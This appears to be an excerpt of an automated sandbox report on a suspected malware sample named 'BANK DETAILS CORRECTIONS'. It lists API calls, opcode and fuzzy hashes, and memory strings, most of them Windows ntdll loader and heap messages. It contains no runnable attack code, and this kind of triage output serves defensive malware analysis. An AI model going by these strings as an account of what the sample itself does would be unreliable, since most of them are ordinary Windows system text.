                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: 6802180a958eeac38b6ea67b7a7c0e4f8763f99523d6332111b450e28db32ed1
                                                                                    • Instruction ID: 110a0b9ee04f214e87efad0a39a3068594b96c787fc9363dcce442e553ea2a05
                                                                                    • Opcode Fuzzy Hash: 6802180a958eeac38b6ea67b7a7c0e4f8763f99523d6332111b450e28db32ed1
                                                                                    • Instruction Fuzzy Hash: AD21E0B6A405096BDB10EA74D8419EFBBA6FB85350F90916AE40087742FB36E90787D1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8D018956,00000007,00000000,00000004,00000000,0041842B,000000F0,?,?,?,?,?), ref: 0042BF2C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: 5a169732afa6aff991ebcad3fa27065717f0e9bfdc183db1891d71a79b6e1df2
                                                                                    • Instruction ID: 226aa46206b082f3f0b7cc3d1162fd8f06d2a1efa3e686318639b4b52788a07b
                                                                                    • Opcode Fuzzy Hash: 5a169732afa6aff991ebcad3fa27065717f0e9bfdc183db1891d71a79b6e1df2
                                                                                    • Instruction Fuzzy Hash: 2BE06D722403087BD614EE9AEC41E9B73ACEFC9710F404419F908A7242C670BD118BB8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(?,0041EFBD,?,?,00000000,?,0041EFBD,?,?,?), ref: 0042BEDF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 155d2ca0e49570fce6dd7913210fda3c96ada45557fba19d452b247bf798f79e
                                                                                    • Instruction ID: ebd9232dc1e0bfe1a3e14a6c5c49fa631e3cba523b414052acf990924d099404
                                                                                    • Opcode Fuzzy Hash: 155d2ca0e49570fce6dd7913210fda3c96ada45557fba19d452b247bf798f79e
                                                                                    • Instruction Fuzzy Hash: 2AE0ED752053147FD614EE99EC46E9B77ACDFC9720F404419FA0CA7241D670B9118BB9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • ExitProcess.KERNEL32(?,00000000,?,?,887B48C4,?,?,887B48C4), ref: 0042BF6A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcess
                                                                                    • String ID:
                                                                                    • API String ID: 621844428-0
                                                                                    • Opcode ID: f47fe61cd714243a0923b91c7a07fc01a235d49edc0e76cf4567a31063eaecde
                                                                                    • Instruction ID: e3387e90dd4933c7bc34f3c3e13bc4aacfdf77fe87129df439f1b489d453ad12
                                                                                    • Opcode Fuzzy Hash: f47fe61cd714243a0923b91c7a07fc01a235d49edc0e76cf4567a31063eaecde
                                                                                    • Instruction Fuzzy Hash: 3BE04F356003147BD620FA5AEC41FDBB7ACDFC5760F404019FA0CA7242C67579018BE4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 6dd2e59d232d9de3b60771a625f94e67bf46f49175e58542fe50eaa73a6dcd2d
                                                                                    • Instruction ID: b69de59f4f67094dbdc195185d6c1637f056c8ff925a8a577b81c70f78390aad
                                                                                    • Opcode Fuzzy Hash: 6dd2e59d232d9de3b60771a625f94e67bf46f49175e58542fe50eaa73a6dcd2d
                                                                                    • Instruction Fuzzy Hash: E5B09B71D015C5C9DA15F764460C71779487BD0701F15C071D2070641F473CC1D1E275
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-2160512332
                                                                                    • Opcode ID: 9fb1860ce55770feb1d14c7b4cd931898096c312aebe27c11c97cb0be11cca65
                                                                                    • Instruction ID: 838f389c0dafd2fff93fe5340a4e5acdee2ff53e1cf9256df4c05cd7e97ab564
                                                                                    • Opcode Fuzzy Hash: 9fb1860ce55770feb1d14c7b4cd931898096c312aebe27c11c97cb0be11cca65
                                                                                    • Instruction Fuzzy Hash: 95928071604342AFE721CF28C880F6BB7E8BB84754F54492DFA98D7251D770E948CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • Invalid debug info address of this critical section, xrefs: 019954B6
                                                                                    • Address of the debug info found in the active list., xrefs: 019954AE, 019954FA
                                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019954E2
                                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0199540A, 01995496, 01995519
                                                                                    • corrupted critical section, xrefs: 019954C2
                                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019954CE
                                                                                    • Critical section address, xrefs: 01995425, 019954BC, 01995534
                                                                                    • undeleted critical section in freed memory, xrefs: 0199542B
                                                                                    • 8, xrefs: 019952E3
                                                                                    • Critical section debug info address, xrefs: 0199541F, 0199552E
                                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 01995543
                                                                                    • Critical section address., xrefs: 01995502
                                                                                    • double initialized or corrupted critical section, xrefs: 01995508
                                                                                    • Thread identifier, xrefs: 0199553A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                    • API String ID: 0-2368682639
                                                                                    • Opcode ID: 733c2656ad7cff0df20baaf20b7774f9b0de794cbb154625c3178e5bdad0638e
                                                                                    • Instruction ID: 7b3aab70945cd82104ecf3c531503453aa368a29bc49063ba56ef07a1e8f3db9
                                                                                    • Opcode Fuzzy Hash: 733c2656ad7cff0df20baaf20b7774f9b0de794cbb154625c3178e5bdad0638e
                                                                                    • Instruction Fuzzy Hash: DA818F71E00348EFEF21CF99C845BAEBBB9AB88B14F11415AE50CB7291D371A941CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019922E4
                                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01992412
                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01992624
                                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01992409
                                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01992602
                                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 0199261F
                                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019924C0
                                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01992506
                                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01992498
                                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019925EB
                                                                                    • @, xrefs: 0199259B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                    • API String ID: 0-4009184096
                                                                                    • Opcode ID: 221aee61dedd2e35374e4e3ebd437fa1339877d0a756018ac929443d6877f8a5
                                                                                    • Instruction ID: 91124e71ffa9f6a7cef838340f2d2c3c3cd6dc52475405812298257f002f8426
                                                                                    • Opcode Fuzzy Hash: 221aee61dedd2e35374e4e3ebd437fa1339877d0a756018ac929443d6877f8a5
                                                                                    • Instruction Fuzzy Hash: 290271B1D00229AFDF61DB58CC80BD9B7B8AB54714F4441DAAA4DB7242D730AE84CF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimeuserer.exe$services.exe$smss.exe$svchost.exe
                                                                                    • API String ID: 0-2515994595
                                                                                    • Opcode ID: 39cd2dff7b9f5c7656d609c10743037f2b8977358c81ab6911cb1ac135140fbe
                                                                                    • Instruction ID: 0dc24f6ebc78a7732deebfb1de4ae928325f8a60ead8f886f79904a4327564bb
                                                                                    • Opcode Fuzzy Hash: 39cd2dff7b9f5c7656d609c10743037f2b8977358c81ab6911cb1ac135140fbe
                                                                                    • Instruction Fuzzy Hash: 4751A0715143159BD729DF188844BABBBECEF94B50F14492DEA9DC3240E770D608CB93
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                    • API String ID: 0-1700792311
                                                                                    • Opcode ID: edbdb7ab2936414c40a4d26edd50910b07d2ffde127f4db93e1d9916f7632cdf
                                                                                    • Instruction ID: bcfe491c1257f3a6419ce5cc78e787da3aa8c03a3ddf44fb51f41e1148a0ce04
                                                                                    • Opcode Fuzzy Hash: edbdb7ab2936414c40a4d26edd50910b07d2ffde127f4db93e1d9916f7632cdf
                                                                                    • Instruction Fuzzy Hash: 04D1ED39600686DFDB22DFA8C440AADBFF6FF89714F08C059F94A9B252C7349981CB10
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 019A8A67
                                                                                    • VerifierDebug, xrefs: 019A8CA5
                                                                                    • VerifierDlls, xrefs: 019A8CBD
                                                                                    • AVRF: -*- final list of providers -*- , xrefs: 019A8B8F
                                                                                    • HandleTraces, xrefs: 019A8C8F
                                                                                    • VerifierFlags, xrefs: 019A8C50
                                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 019A8A3D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                    • API String ID: 0-3223716464
                                                                                    • Opcode ID: 343d64d0b2cabf66a10a8a323ef1d7222ca2a76a0156468951f7ef095d46f07e
                                                                                    • Instruction ID: d8f0e35b5a0802e3fe6077dacaf4142f5d143f16e63dc8681cd8ce830b981e68
                                                                                    • Opcode Fuzzy Hash: 343d64d0b2cabf66a10a8a323ef1d7222ca2a76a0156468951f7ef095d46f07e
                                                                                    • Instruction Fuzzy Hash: B4912472A41316AFD322EF688890F5B77B8EBD5B15F850818FA4D6B240C770AC09CBD5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                    • API String ID: 0-1109411897
                                                                                    • Opcode ID: a8f65f47745e921e85487f90d6a744f8ccd430c228f9ecaf5d2ac588ec832f24
                                                                                    • Instruction ID: d62441c44071e3a3cbcbe6e4a549ed5ea10883060a8ef0f46c652d7b3583d78b
                                                                                    • Opcode Fuzzy Hash: a8f65f47745e921e85487f90d6a744f8ccd430c228f9ecaf5d2ac588ec832f24
                                                                                    • Instruction Fuzzy Hash: 83A25A74A0562A8FDB64DF28CD98BADBBB5BF45705F2442E9D90DA7254DB309E80CF00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-792281065
                                                                                    • Opcode ID: 8ea7361f02addd29e466fb21943f212eb47d06df3d73392997433a74ff4f4177
                                                                                    • Instruction ID: 39ba4bbf45e16e386c47d5a913cacb0be207af00f9f3897c9a16b70942305133
                                                                                    • Opcode Fuzzy Hash: 8ea7361f02addd29e466fb21943f212eb47d06df3d73392997433a74ff4f4177
                                                                                    • Instruction Fuzzy Hash: F7913470B003169BEF36DF18D944BAE7BA9BF91B25F500168E90CBB285D7B49843C791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • LdrpInitShimEngine, xrefs: 019799F4, 01979A07, 01979A30
                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019799ED
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01979A11, 01979A3A
                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01979A2A
                                                                                    • apphelp.dll, xrefs: 01916496
                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01979A01
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-204845295
                                                                                    • Opcode ID: 5704d7c81f02614730e24668286f8ce27ff8cc6db836a1135fb6b94dc46802e7
                                                                                    • Instruction ID: 73cfb89cca0dad7e0be358aae39222391d1547f827cfb4d3b07e31ebed31053e
                                                                                    • Opcode Fuzzy Hash: 5704d7c81f02614730e24668286f8ce27ff8cc6db836a1135fb6b94dc46802e7
                                                                                    • Instruction Fuzzy Hash: 8451CE716083099FE725EF24C881EAB77E8FFC4758F00091DE589972A4DA70E984CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • Loading import redirection DLL: '%wZ', xrefs: 01998170
                                                                                    • LdrpInitializeImportRedirection, xrefs: 01998177, 019981EB
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01998181, 019981F5
                                                                                    • LdrpInitializeProcess, xrefs: 0195C6C4
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0195C6C3
                                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 019981E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 0-475462383
                                                                                    • Opcode ID: 5ec35e4192d721516705cf6ed2dd50febd124e8e4a9aff2cd57b16d069ffc839
                                                                                    • Instruction ID: 4b0ea49e231d2ac0249253796e71f977fc60fb051037c9785267ccda51ef8478
                                                                                    • Opcode Fuzzy Hash: 5ec35e4192d721516705cf6ed2dd50febd124e8e4a9aff2cd57b16d069ffc839
                                                                                    • Instruction Fuzzy Hash: A131F2B16443069FD724EF28DC46E2A7798FFD5B10F04055CF98DAB291E660ED05C7A2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01992178
                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 01992160, 0199219A, 019921BA
                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0199219F
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 01992165
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01992180
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019921BF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                    • API String ID: 0-861424205
                                                                                    • Opcode ID: ab05b0ec81f0b47774a6e9c689b91ab40d2e4733a2f8d749efc68a8a005f3cdd
                                                                                    • Instruction ID: 4e4dfbd1684bcfbfd2f779d164df1a308044d61face4a9bda5167790122ca553
                                                                                    • Opcode Fuzzy Hash: ab05b0ec81f0b47774a6e9c689b91ab40d2e4733a2f8d749efc68a8a005f3cdd
                                                                                    • Instruction Fuzzy Hash: A731C876A41215BBEB22DBD98C85F6A7B7CEBA5A51F054059FF0C77140D370AA00C7A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 01962DF0: LdrInitializeThunk.NTDLL ref: 01962DFA
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01960BA3
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01960BB6
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01960D60
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01960D74
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 1404860816-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                    • API String ID: 0-3126994380
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                    • API String ID: 0-379654539
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • LdrpInitializeProcess, xrefs: 01958422
                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0195855E
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01958421
                                                                                    • @, xrefs: 01958591
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-1918872054
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019922B6
                                                                                    • .Local, xrefs: 019528D8
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 019921DE
                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019921D9, 019922B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                    • API String ID: 0-1239276146
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01993437
                                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0199342A
                                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01993456
                                                                                    • RtlDeactivateActivationContext, xrefs: 01993425, 01993432, 01993451
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                    • API String ID: 0-1245972979
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019810AE
                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01981028
